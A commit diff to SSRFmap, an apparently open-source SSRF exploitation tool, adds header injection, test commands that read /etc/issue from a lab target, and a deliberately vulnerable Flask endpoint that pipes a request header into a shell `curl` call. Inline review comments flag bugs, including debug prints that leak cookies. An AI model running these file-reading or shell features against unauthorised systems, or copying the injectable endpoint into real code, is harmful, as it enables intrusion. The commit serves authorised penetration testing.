Injection in headers

pull/53/head
Swissky 2024-06-08 21:53:36 +02:00
parent 404e0a49aa
commit febd5df763
4 changed files with 50 additions and 5 deletions

View File

@ -108,6 +108,12 @@ Use the `-m` followed by module name (separated by a `,` if you want to launch s
python ssrfmap.py -r examples/request.txt -p url -m readfiles,portscan
```
If you want to inject inside a header, a GET or a POST parameter, you only need to specify the parameter name
```powershell
python ssrfmap.py -r examples/request6.txt -p X-Custom-Header -m readfiles --rfiles /tmp/test
```
If you need to have a custom user-agent use the `--uagent`. Some targets will use HTTPS, you can enable it with `--ssl`.
```powershell
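Review bot: the new sentence at "If you want to inject inside a header ... you only need to specify the parameter name" should state that the header has to already be present in the request file, because `do_request` only injects when `param in self.headers` is true; a header name that is not in the captured request is silently not injected and the user gets no feedback. Also end the sentence with a period and consider tagging the fence `bash` rather than `powershell`, since the command is run on a Linux box in the surrounding examples.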
@ -115,7 +121,7 @@ If you need to have a custom user-agent use the `--uagent`. Some targets will us
python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
```
Some modules allow you to create a connect back, you have to specify LHOST and LPORT. Also SSRFmap can listen for the incoming reverse shell.
Some modules allow you to create a connect back, you have to specify `LHOST` and `LPORT`. Also SSRFmap can listen for the incoming reverse shell.
```powershell
# Triggering a reverse shell on a Redis
@ -148,6 +154,17 @@ A quick way to test the framework can be done with `data/example.py` SSRF servic
docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles
```
Launch the tests requests:
```ps1
docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request2.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request3.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request4.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request5.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request6.txt -p X-Custom-Header -m readfiles --rfiles /etc/issue
```
## Contribute
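Review bot: the fence tag here is `ps1` while the other README blocks use `powershell`; pick one (or `bash`, as these are `docker exec` commands). The new `request6.txt` line is the only one that targets a header, so a one-line comment above it saying it exercises header injection via `X-Custom-Header` would make the purpose of each test request clearer.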

View File

@ -75,6 +75,15 @@ class Requester(object):
def do_request(self, param, value, timeout=3, stream=False):
try:
# Handle injection in the headers
# Copying data to avoid multiple variables edit
header_injected = self.headers.copy()
if param in self.headers:
header_injected[param] = value
print('inject in header')
print(header_injected)
if self.method == "POST":
# Copying data to avoid multiple variables edit
data_injected = self.data.copy()
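Review bot: the `print('inject in header')` and `print(header_injected)` calls look like leftover debugging; they dump the full header set, including any `Cookie` or `Authorization` value from the request file, to stdout on every request. Drop them or route them through the module's logger at debug level. Separately, `if param in self.headers` is a case-sensitive dict lookup while HTTP header names are case-insensitive, so `-p X-Custom-Header` will not match a request file containing `x-custom-header`; either normalise the key comparison or document that the name must match exactly.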
@ -86,7 +95,7 @@ class Requester(object):
if self.headers['Content-Type'] and "application/json" in self.headers['Content-Type']:
r = requests.post(
self.protocol + "://" + self.host + self.action,
headers=self.headers,
headers=header_injected,
json=data_injected,
timeout=timeout,
stream=stream,
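Review bot: the branch selection on `if self.headers['Content-Type'] and "application/json" in self.headers['Content-Type']:` still reads the un-injected `self.headers` and raises `KeyError` when the request file has no `Content-Type`; `self.headers.get('Content-Type', '')` avoids the crash. Reading the original dict here is probably the intended behaviour (an injected `Content-Type` value should not change which code path runs), but a short comment saying so would stop the next reader from "fixing" it to `header_injected`.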
@ -99,7 +108,7 @@ class Requester(object):
if param == '': data_injected = value
r = requests.post(
self.protocol + "://" + self.host + self.action,
headers=self.headers,
headers=header_injected,
data=data_injected,
timeout=timeout,
stream=stream,
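Review bot: style point on `if param == '': data_injected = value`: PEP 8 discourages compound statements on one line, and this one is easy to miss next to the header change; split it onto two lines and add a comment that an empty `param` means the whole body is replaced by the payload.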
@ -116,7 +125,7 @@ class Requester(object):
r = requests.post(
self.protocol + "://" + self.host + self.action,
headers=self.headers,
headers=header_injected,
data=data_xml,
timeout=timeout,
stream=stream,
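Review bot: this is the fourth `headers=self.headers` to `headers=header_injected` swap in the same method; the JSON, form, XML and GET branches differ only in the body keyword. Factoring the `requests.post`/`requests.get` call into one helper that takes the body keyword as an argument would make it impossible to miss a branch the next time a shared argument such as `headers` changes.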
@ -137,7 +146,7 @@ class Requester(object):
data_injected = re.sub(regex, param+'='+value, self.action)
r = requests.get(
self.protocol + "://" + self.host + data_injected,
headers=self.headers,
headers=header_injected,
timeout=timeout,
stream=stream,
verify=False,
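Review bot: on `data_injected = re.sub(regex, param+'='+value, self.action)` the payload is used as a `re.sub` replacement string, so any backslash in `value` is interpreted as an escape sequence (`\1`, `\n`) and can raise or mangle the URL; pass a callable (`lambda m: param + '=' + value`) or escape the replacement. Note also that this substitution still runs when `param` is a header name, so a header name that also appears as a query-string key gets injected in both places. `verify=False` is pre-existing but deserves a comment explaining that certificate checks are intentionally disabled for lab targets.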

View File

@ -48,6 +48,15 @@ def ssrf4():
except Exception as e:
return e
# curl -v "http://127.0.0.1:5000/ssrf5" -H 'X-Custom-Header: http://example.com'
@app.route("/ssrf5", methods=['GET'])
def ssrf5():
data = request.headers.get('X-Custom-Header')
content = command(f"curl {data}")
return content
def command(cmd):
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
(out, err) = proc.communicate()
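Review bot: `ssrf5` interpolates the raw `X-Custom-Header` value into `command(f"curl {data}")`, which runs with `shell=True`, so this endpoint demonstrates shell command injection as well as SSRF; the comment above `@app.route("/ssrf5", ...)` should say the service is intentionally vulnerable and only meant to run inside the example container. When the header is absent, `request.headers.get('X-Custom-Header')` returns `None` and the endpoint executes `curl None`; returning a 400 in that case keeps the test output unambiguous.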

examples/request6.txt Normal file
View File

@ -0,0 +1,10 @@
GET /ssrf5 HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://mysimple.ssrf/
X-Custom-Header: http://example.com
Connection: close
Upgrade-Insecure-Requests: 1